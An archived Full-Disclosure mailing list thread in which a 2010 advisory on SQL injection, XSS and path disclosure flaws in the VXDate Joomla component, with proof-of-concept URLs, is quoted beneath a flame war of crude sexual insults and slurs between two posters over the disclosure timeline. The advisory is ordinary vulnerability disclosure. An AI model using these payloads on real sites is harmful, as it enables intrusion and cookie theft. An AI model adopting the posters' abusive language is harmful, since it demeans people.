lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 22 Mar 2010 09:26:11 -0400
From: julian steward <julian.steward09@...il.com>
To: Anders Klixbull <akl@...erian.dk>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Vulnerabilities in VXDate for Joomla

Yup, and that's pretty much how your born.

Welcome in real life cunt.

On Mon, Mar 22, 2010 at 8:53 AM, Anders Klixbull <akl@...erian.dk> wrote:

>  yeah sure..
> you junkies are alle the same you suck dicks for cheeseburgers and crack
>
>
>
>  ------------------------------
>  *From:* julian steward [mailto:julian.steward09@...il.com]
> *Sent:* 22. marts 2010 13:50
> *To:* Anders Klixbull
> *Cc:* full-disclosure@...ts.grok.org.uk
>
> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>
>   Na only when i need to light up your mom"s crack bang when she's to
> fucking high.
>
> On Mon, Mar 22, 2010 at 8:42 AM, Anders Klixbull <akl@...erian.dk> wrote:
>
>>  why does it hurt when you suck lemons?
>> does your teeth gets fucked up when you smoke cock all day?
>>
>>
>>
>>  ------------------------------
>>  *From:* julian steward [mailto:julian.steward09@...il.com]
>> *Sent:* 22. marts 2010 13:39
>> *To:* Anders Klixbull; full-disclosure@...ts.grok.org.uk
>>
>> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>>
>>   Yup ur fucking right, as mustdie.
>>
>> 2 cockmunch for the price of one.
>>
>> Nice.
>>
>> On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull <akl@...erian.dk> wrote:
>>
>>>   lol look who's talking about being professional
>>> yeah sure because klixbull is such a russian name right?
>>> and oh yeah my email address also ends in .ua
>>> julian its time to stop gobbling that cock and shut the fuck up
>>>
>>>
>>>
>>>  ------------------------------
>>>  *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
>>> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *julian steward
>>> *Sent:* 22. marts 2010 13:34
>>> *To:* full-disclosure@...ts.grok.org.uk >> fdisclo
>>>
>>> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>>>
>>>    Sucking lemon hurts, I don't see why I would suck one Mr Klixbull
>>>
>>> Regarding his disclosure, then he shall stfu about the timeline if he
>>> wanna be "professional".
>>>
>>> Yup Klixbull it's time to close your basement door and your mounth, or
>>> are you too from .ua btw ?
>>>
>>>
>>>>
>>>>
>>>>
>>>>
>>>> On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull <akl@...erian.dk>wrote:
>>>>
>>>>>  bohooo stop crying
>>>>> he can disclose bugs when he feels like it
>>>>> if you dont like that then go suck a lemon
>>>>>
>>>>>
>>>>>
>>>>>  ------------------------------
>>>>> *From:* full-disclosure-bounces@...ts.grok.org.uk [mailto:
>>>>> full-disclosure-bounces@...ts.grok.org.uk] *On Behalf Of *julian
>>>>> steward
>>>>> *Sent:* 22. marts 2010 00:16
>>>>> *To:* MustLive; full-disclosure@...ts.grok.org.uk
>>>>> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>>>>>
>>>>>   7 month to inform the dev's, what kind of asshole are you ?
>>>>>
>>>>> Oh wait, were you hacking some n00bs website, with your shitty dork ?
>>>>>
>>>>> 2010/3/17 MustLive <mustlive@...security.com.ua>
>>>>>
>>>>>> Hello Full-Disclosure!
>>>>>>
>>>>>> I want to warn you about vulnerabilities in component VXDate for
>>>>>> Joomla.
>>>>>>
>>>>>> -----------------------------
>>>>>> Advisory: Vulnerabilities in VXDate for Joomla
>>>>>> -----------------------------
>>>>>> URL: http://websecurity.com.ua/3849/
>>>>>> -----------------------------
>>>>>> Timeline:
>>>>>>
>>>>>> 10.05.2009 - found the vulnerabilities.
>>>>>> 12.01.2010 - announced at my site.
>>>>>> 18.01.2010 - informed developers.
>>>>>> 13.03.2010 - disclosed at my site.
>>>>>> -----------------------------
>>>>>> Details:
>>>>>>
>>>>>> These are Full path disclosure, SQL Injection and Cross-Site Scripting
>>>>>> vulnerabilities.
>>>>>>
>>>>>> Full path disclosure:
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=’
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=’
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’
>>>>>>
>>>>>> SQL Injection:
>>>>>>
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
>>>>>>
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
>>>>>>
>>>>>> XSS:
>>>>>>
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>>>>>>
>>>>>>
>>>>>> http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
>>>>>>
>>>>>> Vulnerable are potentially all versions of VXDate.
>>>>>>
>>>>>> Best wishes & regards,
>>>>>> MustLive
>>>>>> Administrator of Websecurity web site
>>>>>> http://websecurity.com.ua
>>>>>>
>>>>>> _______________________________________________
>>>>>> Full-Disclosure - We believe in it.
>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>
>>>>>
>>>>>
>>>>
>>>
>>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ